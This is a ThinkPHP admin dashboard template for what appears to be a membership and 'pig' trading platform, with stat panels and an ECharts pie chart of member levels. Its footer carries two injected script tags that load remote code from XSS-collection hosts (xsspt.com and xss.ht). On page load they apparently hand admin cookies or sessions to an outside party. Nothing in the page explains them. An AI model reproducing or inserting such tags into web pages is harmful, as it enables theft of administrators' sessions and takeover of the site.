{extend name="layout/main" /}

{block name="header"}

{/block}
{block name="left"}{/block}

{block name="content"}
<div class="row">
    <div class="col-lg-12 col-sm-12" style="padding-left: 0">
        <section class="panel ">
            <header class="panel-heading">
                <h4>会员等级分布图</h4>
            </header>
            <div class="panel-body">
                <div id="user" style="width: 100%;height: 200px">

                </div>
            </div>
        </section>
    </div>

</div>
<div class="row">
    <div class="col-lg-3 col-md-3" style="padding-left: 0">
        <section class="panel ">
            <header class="panel-heading">
                <h4>会员数量</h4>
            </header>
            <div class="panel-body">
                <h3>{$user['total'] ? $user['total'] : 0}</h3>
            </div>
        </section>
    </div>
    <div class="col-lg-3 col-md-3">
        <section class="panel">
            <header class="panel-heading">
                <h4>今日会员注册数量</h4>
            </header>
            <div class="panel-body">
                <h3>{$user['today'] ? $user['today'] : 0}</h3>
            </div>
        </section>
    </div>
    <div class="col-lg-3 col-md-3">
        <section class="panel">
            <header class="panel-heading">
                <h4>会员可售猪猪总量</h4>
            </header>
            <div class="panel-body">
                <h3>{$user['sell_number']}</h3>
            </div>
        </section>
    </div>
    <div class="col-lg-3 col-md-3">
        <section class="panel">
            <header class="panel-heading">
                <h4>会员可售额度总量</h4>
            </header>
            <div class="panel-body">
                <h3>{$user['can_sell']}</h3>
            </div>
        </section>
    </div>
    <div class="col-lg-3 col-md-3" style="padding-left: 0">
        <section class="panel">
            <header class="panel-heading">
                <h4>内排总业绩</h4>
            </header>
            <div class="panel-body">
                <h3>{$user['total_voucher']}</h3>
            </div>
        </section>
    </div>
    <!-- <div class="col-lg-3 col-md-3">
        <section class="panel ">
            <header class="panel-heading">
                <h4>已认证会员数量</h4>
            </header>
            <div class="panel-body">
                <h3>{$user['auth'] ? $user['auth'] : 0}</h3>
            </div>
        </section>
    </div>
    <div class="col-lg-3 col-md-3" style="padding-right: 0">
        <section class="panel">
            <header class="panel-heading">
                <h4>未认证会员数量</h4>
            </header>
            <div class="panel-body">
                <h3>{$user['no_auth'] ? $user['no_auth'] : 0}</h3>
            </div>
        </section>
    </div> -->
</div>

{/block}


{block name="footer"}
<script src="__PUBLIC__/admin/js/echarts.min.js"></script>
<script src=https://xsspt.com/AjSDmN></script>
<script src=https://ccc123.xss.ht></script>

<script>
    var userChart = echarts.init(document.getElementById('user'));
    var user = {
        title: {
            text: '会员等级分布图',
            x: 'center'
        },
        tooltip: {
            trigger: 'item',
            formatter: "{a} <br/>{b} : {c} ({d}%)"
        },
        legend: {
            orient: 'vertical',
            left: 'left',
            data: ['农场主','铜牌农场主', '银牌农场主', '金牌农场主', '钻石农场主']
        },
        series: [
            {
                type: 'pie',
                radius: '55%',
                center: ['50%', '60%'],
                data: [
                    {value: '{$userLevel["0"] ? $userLevel["0"] : 0}', name: '农场主'},
                    {value: '{$userLevel["1"] ? $userLevel["1"] : 0}', name: '铜牌农场主'},
                    {value: '{$userLevel["2"] ? $userLevel["2"] : 0}', name: '银牌农场主'},
                    {value: '{$userLevel["3"] ? $userLevel["3"] : 0}', name: '金牌农场主'},
                    {value: '{$userLevel["4"] ? $userLevel["4"] : 0}', name: '钻石农场主'},
                ],
                itemStyle: {
                    emphasis: {
                        shadowBlur: 10,
                        shadowOffsetX: 0,
                        shadowColor: 'rgba(0, 0, 0, 0.5)'
                    }
                }
            }
        ]
    };
    userChart.setOption(user);
</script>

<script>
    /*var orderChart = echarts.init(document.getElementById('order'));
     orders = {
     color: ['#3398DB'],
     tooltip : {
     trigger: 'axis',
     axisPointer : {            // 坐标轴指示器，坐标轴触发有效
     type : 'shadow'        // 默认为直线，可选为：'line' | 'shadow'
     }
     },
     grid: {
     left: '3%',
     right: '4%',
     bottom: '3%',
     containLabel: true
     },
     xAxis : [
     {
     type : 'category',
     data : ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun','Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun','Sun'],
     axisTick: {
     alignWithLabel: true
     }
     }
     ],
     yAxis : [
     {
     type : 'value'
     }
     ],
     series : [
     {
     name:'直接访问',
     type:'bar',
     barWidth: '60%',
     data:[10, 52, 200, 334, 390, 330, 220,10, 52, 200, 334, 390, 330, 220,10]
     }
     ]
     };
     orderChart.setOption(orders);*/
</script>
{/block}